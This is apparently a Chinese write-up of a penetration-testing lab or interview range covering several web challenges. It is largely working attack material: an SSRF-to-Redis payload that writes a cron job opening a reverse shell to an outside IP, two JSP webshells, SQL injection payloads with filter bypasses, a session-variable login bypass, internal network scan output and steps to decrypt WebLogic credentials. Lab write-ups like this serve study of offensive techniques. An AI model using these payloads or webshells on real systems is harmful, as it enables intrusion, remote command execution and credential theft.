web1-1
读了一下源码
1
|
file:///var/www/html/index.php
|
1
2
3
4
5
6
7
8
9
|
<?php
$url = $_POST['url'];
if($url){
echo "<b>".$url." 的快照如下:</b><br><br>";
echo "<pre>";
curl($url);
echo "</pre>";
}
?>
|
web1-3
考点:redis写定时任务反弹shell到vps
打file:///etc/hosts有
然后爆破c断和端口
发现172.18.240.7 redis未授权
那就打SSRF漏洞Redis反弹shell
实战篇——SSRF漏洞Redis反弹shell实战 - yaoguyuan - 博客园
1
|
gopher://172.18.240.7:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/101.200.39.193/1234%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2416%0D%0A/var/spool/cron/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
|
但是一直没弹上?然后我又url编码一次打还是不行,换下面打法,成功!
1
2
3
4
5
|
dict://172.18.240.7:6379/flushall
dict://172.18.240.7:6379/config set dir /var/spool/cron
dict://172.18.240.7:6379/config set dbfilename root
dict://172.18.240.7:6379/set x "\n* * * * * /bin/bash -i >& /dev/tcp/101.200.39.193/5000 0>&1\n"
dict://172.18.240.7:6379/save
|
GitHub - xmsec/redis-ssrf: redis ssrf gopher generater & redis ssrf to rce by master-slave-sync
本来这个方法,但是不行……
web1-2
考点: DICT 协议连接到 Redis 服务
通过 DICT 协议连接到 Redis 服务,拿flag
1
|
dict://172.18.240.7:6379/keys *
|
1
|
dict://172.18.240.7:6379/get:flag
|
web2-1
考点:weblogic-cve
[记错]访问项目报错Error 404–Not Found | From RFC 2068 Hypertext Transfer Protocol-CSDN博客
访问/console得到
直接搜weblogic漏洞
记一次weblogic-10.3.6.0靶场漏洞利用_weblogic10.3.6版本漏洞-CSDN博客
干货 | 最全的Weblogic漏洞复现-腾讯云开发者社区-腾讯云
看第一篇得到一个工具,直接拿flag
web2-2
考点:weblogic的CVE_2016_0638_ECHO漏洞+解weblogic的密文得数据库密码
接下来参考此文
记一次weblogic-10.3.6.0靶场漏洞利用
删掉端口后面多余字符,输入/uddiexplorer/
随便在右上角找了一个图片的路径
1
|
http://119.45.164.136:7001/uddiexplorer/help.gif
|
复制图片文件名 到weblogic中用命令去查找
然后我们pwd看一下当前的目录
1
|
/root/Oracle/Middleware/user_projects/domains/base_domain
|
然后拼接一下路径
1
|
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/uddiexplorer/5f6ebw/war/
|
这个路径就是我们可以上传文件的路径
然后上传shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
|
蚁剑连
上传fscan,并附权限,ifconfig看ip
1
|
./fscan -h 172.16.10.0/24,172.25.20.0/24,172.26.30.0/24
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
|
[*] LiveTop 172.25.20.0/24 段存活数量为: 3
[*] LiveTop 172.16.10.0/24 段存活数量为: 2
[*] LiveTop 172.26.30.0/24 段存活数量为: 1
172.26.30.1:7001 open
172.25.20.10:7001 open
172.16.10.1:7001 open
172.16.10.8:7001 open
172.26.30.1:6379 open
172.16.10.1:6379 open
172.25.20.12:3306 open
172.26.30.1:22 open
172.25.20.1:22 open
172.16.10.1:22 open
172.16.10.1:8082 open
172.26.30.1:8081 open
172.16.10.1:8081 open
172.26.30.1:80 open
172.16.10.1:80 open
172.26.30.1:8082 open
172.26.30.1:8848 open
172.16.10.1:8848 open
[*] WebTitle http://172.26.30.1 code:200 len:1925 title:Hello!
[*] WebTitle http://172.16.10.1 code:200 len:1925 title:Hello!
[*] WebTitle http://172.26.30.1:8081 code:200 len:11217 title:Apache Tomcat/11.0.14
[*] WebTitle http://172.16.10.1:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle http://172.26.30.1:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle http://172.16.10.1:8081 code:200 len:11217 title:Apache Tomcat/11.0.14
[*] WebTitle http://172.26.30.1:8082 code:200 len:15928 title:BEES企业网站管理系统_企业建站系统_外贸网站建设_企业CMS_PHP营销企业网站�
[*] WebTitle http://172.16.10.1:8082 code:200 len:15928 title:BEES企业网站管理系统_企业建站系统_外贸网站建设_企业CMS_PHP营销企业网站�
[+] PocScan http://172.16.10.1:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.26.30.1:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.16.10.1:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] PocScan http://172.26.30.1:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[*] WebTitle http://172.16.10.8:7001 code:404 len:1164 title:Error 404--Not Found
[*] WebTitle http://172.25.20.10:7001 code:404 len:1164 title:Error 404--Not Found
[*] WebTitle http://172.16.10.1:7001 code:404 len:1164 title:Error 404--Not Found
[*] WebTitle http://172.26.30.1:7001 code:404 len:1164 title:Error 404--Not Found
[+] Redis 172.16.10.1:6379 unauthorized file:/tmp/redis.log
[+] InfoScan http://172.26.30.1:7001 [weblogic]
[+] InfoScan http://172.25.20.10:7001 [weblogic]
[+] InfoScan http://172.16.10.8:7001 [weblogic]
[+] InfoScan http://172.16.10.1:7001 [weblogic]
[+] Redis 172.26.30.1:6379 unauthorized file:/tmp/redis.log
[+] PocScan http://172.26.30.1:7001 poc-yaml-weblogic-ssrf
[+] PocScan http://172.16.10.8:7001 poc-yaml-weblogic-ssrf
[+] PocScan http://172.16.10.1:7001 poc-yaml-weblogic-ssrf
[+] PocScan http://172.26.30.1:7001 poc-yaml-weblogic-cve-2020-14750
[+] PocScan http://172.16.10.8:7001 poc-yaml-weblogic-cve-2020-14750
[+] PocScan http://172.16.10.1:7001 poc-yaml-weblogic-cve-2020-14750
[+] PocScan http://172.25.20.10:7001 poc-yaml-weblogic-cve-2020-14750
[+] PocScan http://172.25.20.10:7001 poc-yaml-weblogic-ssrf
[+] PocScan http://172.26.30.1:7001 poc-yaml-weblogic-cve-2019-2729-1
[+] PocScan http://172.26.30.1:7001 poc-yaml-weblogic-cve-2019-2729-2
[+] PocScan http://172.16.10.8:7001 poc-yaml-weblogic-cve-2019-2729-1
[+] PocScan http://172.16.10.8:7001 poc-yaml-weblogic-cve-2019-2729-2
[+] PocScan http://172.25.20.10:7001 poc-yaml-weblogic-cve-2019-2729-1
[+] PocScan http://172.25.20.10:7001 poc-yaml-weblogic-cve-2019-2729-2
[+] PocScan http://172.16.10.1:7001 poc-yaml-weblogic-cve-2019-2729-2
[+] PocScan http://172.16.10.1:7001 poc-yaml-weblogic-cve-2019-2729-1
[+] PocScan http://172.16.10.8:7001 poc-yaml-weblogic-cve-2019-2725 v10
[+] PocScan http://172.26.30.1:7001 poc-yaml-weblogic-cve-2019-2725 v10
[+] PocScan http://172.16.10.1:7001 poc-yaml-weblogic-cve-2019-2725 v10
[+] PocScan http://172.25.20.10:7001 poc-yaml-weblogic-cve-2019-2725 v10
|
下面的资产是下面的题,这题显然是打172.25.20.12:3306,那显然就是要数据库用户密码
参考[一文解密所有WebLogic密文_加密](https://blog.csdn.net/mashiro_hibiki/article/details/138810444)
1
2
3
4
5
|
weblogic的密文分两类,一类是数据库连接字符串,一类是console登录用户名和密码。
数据库连接字符串一般是在config/jdbc目录下的**jdbc.xml文件
密钥文件:SerializedSystemIni.dat默认位置:
/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat
|
1
|
{AES}ZhArsOkXPBA9AvAwRxNxpK4G0WlHlpNFBZVsu+PDlYU=
|
1
|
cat ./security/SerializedSystemIni.dat | base64
|
1
2
|
BNnQ4ugCIIdQsPqblVIj9ILs/o1Wl+QiTx2coQCBU/wdo4laQlBoGDGGuIqvgnI9KKgiD58oczjY
xfmvNlHH5w==
|
Meetsec#1024
然后stowaway挂上代理
用kali挂代理连数据库
1
|
proxychains mysql -h 172.25.20.12 -u root -p --ssl=0
|
然后后输入密码
最后在data的table_name表的value里
web2-3
1
|
SELECT LOAD_FILE('/flag');
|
web3-1
扫描得敏感文件,然后访问得flag
web3-2
考点:heapdump泄露数据库信息
发现了/actuator/heapdump,看看有没有什么信息
解密获得敏感信息
navicat连接数据库拿到flag,
1
|
meetsec-web3{flag2-9edbd4b03b5f86a9abe079bc63ea847b}
|
web4-1
考点:beecms登录页面+文件上传rce
解法一:sql报错注入
1
|
admin' or updatexml(1,concat(0x7e,select database(),0x7e),1)#
|
1
|
admin' and updatexml(1,concat(0x7e,select group_concat(table_name) from information_schema.tables where table_schema='beecms',0x7e),1)#
|
and,where,=,from,select被过滤了,双写+空格绕过(奇怪,前面爆数据库并未过滤)
1
|
admin' an and d updatexml(1,concat(0x7e,(selselectect group_concat(table_name) fr from om information_schema.tables whe where re table_schema like database()),0x7e),1)#
|
1
|
admin' an and d updatexml(1,concat(0x7e,(selselectect group_concat(column_name) fr from om information_schema.columns whe where re table_name like 'bees_admin'),0x7e),1)#
|
1
|
admin' an and d updatexml(1,concat(0x7e,(selselectect group_concat(admin_password) fr from om bees_admin),0x7e),1)#
|
得到md5加密的密码2446d54c2e68d221db9cff653b01a0e,解密后是login123
解法二:sql伪造登入
1
|
user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456
|
[代码审计] beecms 4.0 漏洞总结_bees cms漏洞-CSDN博客
解法三:变量覆盖绕过登入
还有方法,打变量绕过
BeesCMS4.0多处漏洞复现 - 灰信网(软件开发博客聚合)
post提交
1
|
Exp:_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999
|
然后访问admin/admin.php就行
然后参考此文
BeeS CMS 靶场漏洞攻略_beescms漏洞-CSDN博客
上传文件就行
之后蚁剑连接就行
web5
考点:tomcat后台爆破+后台上传文件getshell
后台默认是manager/html
记一次暴力破解tomcat后台密码(附带python脚本)_tomcat后台登录字典-CSDN博客
解码是:tomcat:qwe123
然后上传webshell-cmd2.jsp(压缩为cmd2.zip后改成war后缀上传)
1
2
3
4
5
6
7
8
9
10
11
12
13
|
# cmd2.jsp
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
|
tomcat后台多种姿势getshell_tomcat getshell-CSDN博客
web6
考点:LiqunKit一把梭
web7-1
考点:Shiro反序列化
不过找不到密钥
fscan扫一下,发现有nacos
弱口令nacos/nacos登入,配置里面找到了key
接下来就是打shrio反序列化就行
某公司二面靶场记录 - sawtooth384的博客
某科技公司二面WEB靶场详解-先知社区